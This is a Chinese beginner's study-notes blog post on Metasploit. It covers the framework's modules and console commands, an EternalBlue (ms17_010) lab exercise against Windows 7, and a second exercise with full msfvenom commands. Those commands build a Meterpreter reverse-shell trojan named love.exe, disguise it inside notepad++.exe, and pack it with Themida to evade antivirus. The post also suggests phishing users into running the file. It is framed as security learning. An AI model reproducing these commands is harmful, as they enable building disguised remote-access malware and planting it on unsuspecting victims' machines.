信安学习day1:metasploit的基本介绍和两个实战

 

先序

首先在学习信安要先把自己的配置给处理好(kali、几个靶机等),其次在kali中打开metasploit,

启动用msfconsole,使用此命令后可看到一系列的加载和代码。 如图

此时我们就进入了metasploit了。

到了这里,metasploit就正式开始了。

那么在开始前,我们得知道这个玩意儿是什么个s东西,这是干嘛的。

metasploit是渗透里的核心工具,它是一个渗透框架平台,我们可以通过这个平台获取到可以帮助我们渗透的工具,同时它也简化了在进行攻击或者防御等多个方面时使用的代码量。

Metasploit运用postgreSQL数据库:postgre适合企业应用场景,mysql适合企业逻辑简单,数据可靠性强

所以在使用metasploit前,要将此数据库打开

Systemctl start postgresql

 metasploit框架的内容

基础库(中间部分):

metasploit基础库文件处于根目录路径下的libraries中,里面包含了Rex,framework-core,framework-base三部分。

  Rex:是整个框架所依赖的最基础的一些组件,如包装的网络套接字,日志子系统、postgreSQL等数据库的支持以及渗透攻击支持例程等。

  framework-core:负责所有与各种上层模块及插件的交互接口/、

  framework-base:将framework-core进行扩展,提供更简单的包装例程,并处理框架中各方面的功能,用于支持用户接口与功能程序调用框架本身功能及框架集成模块。

模块:

有6种模块用于不同的途径:

Aux模块(辅助)、exploits模块(渗透攻击)、post模块(后渗透攻击)、payload模块(攻击载荷)、encoders模块(编码器)、nops模块(空指令)。

注:payload,主要来建立目标机与攻击机稳定连接的,通俗来讲就是需要告诉攻击机对目标机有什么破坏,要破坏什么。

插件:

对框架进行扩展或者升级等。 如:外部安全工具:Nessus、OpenVAS漏洞扫描器等。

接口:

包括msfconsole控制终端、msfcll命令行、msfcll图形化界面等多个接口。

功能程序:

提供一系列可直接运行的功能程序。

常用命令:

  1. connect命令:connect [options] <host> <port>

connect www.baidu.com 80

Get /——可以取得更多的信息

 

  2.模块相关的命令show使用方法:

有效参数:all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options, favorites

   Show exploits ——展示exploits模块文件

 

3.模块相关Search搜索:search [<options>] [<keywords>:<value>]

 

Metasploit支持模糊查找

    A.Name:search mysql / search name:mysql

  姓名披露日期排名检查说明

   名字                披露日期          排名        检查            说明

  每个漏洞都利用模块基于他们的影响标记了一个rank字段。

  用户可以通过rank对漏洞进行搜索,分类和排序:

 

排序(可靠性降序排列):

   E xcellent:漏洞利用程序绝对不会使目标服务崩溃,除非特殊情况、内存被破坏;

   Great:该漏洞利用程序有一个默认的目标系统,并可以自动检测的目标系统;

   Good:该漏洞利用程序有一个默认的目标系统

   Normal:利用程序是可靠的,但是依赖于特定版本,不能自动检测

   Average:利用程序不可靠或难以利用

   Low:低于50%的利用成功率

   Manual:不稳定或难以利用并且基于拒绝服务。

   

       path:search path:mysql

搜索路径下的所有mysql文件

       platform

缩小查询范围:search platfrom:mysql

  1. type:通过类型查询

  search type:MySQL

可联合查询,如:根据CVE搜索exploit相关模块:

search CVE:CVE-2017-8404 type:exploits

4.模块相关的命令use:

装载一个渗透攻击模块——back退出

使用exploit/Windows/SMB/ms08_067_netapi

 

      Show options——展示 相关信息

      

Show  targets

  Rhost——目标主机

设置模块:

     set target 34——34参数是指XP 指对XP进行渗透

      Unset target——取消

      配置好后,输入exploit或run就可以执行该模块

5。

info了解模块的相关信息:

A.Info exploit/windows/smb/ms08_067_netapi

    B.use加载后,直接info

 

6.exploit和run开始渗透

  Exploit -j——后台运行

7.session看后台——session -k 2——杀死2 进程

 Session -i num——进行前台运行


第一个实战——win7永恒之蓝:

windows/smb/ms17_010_eternalblue,通过metasploit使用此模块,完成模块的配置进行攻击,拿去权限

 windows里字不符合:统一字符:chcp 65001

第二个实战——设置文件,以应用的方式植病毒,获取权限:

 

在终端里使用

Msfvenom生成远控木马

 msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.147 lport=9999 -f exe -o love.exe

 

 -p:payload,指出攻击此系统所要攻击的目的

-f:生成格式

-o:输出什么样的文件名

此时会出现一个文件,需要用钓鱼之类的让用户下载此文件,从而植入病毒。

打开metasploits:

Use  exploit/multi/handler——攻击其他主机

进行设置(设置鱼钩);端口、用户、payload

进行run的、,等待用户

 

绕开木马病毒技巧:

1.Msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.147 lport=9999 -f exe -x notepad++.exe -o notepad++.exe

-x:模块

但是通过杀毒软件不断更新,此形式也会被淘汰;

2.加壳——themida

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值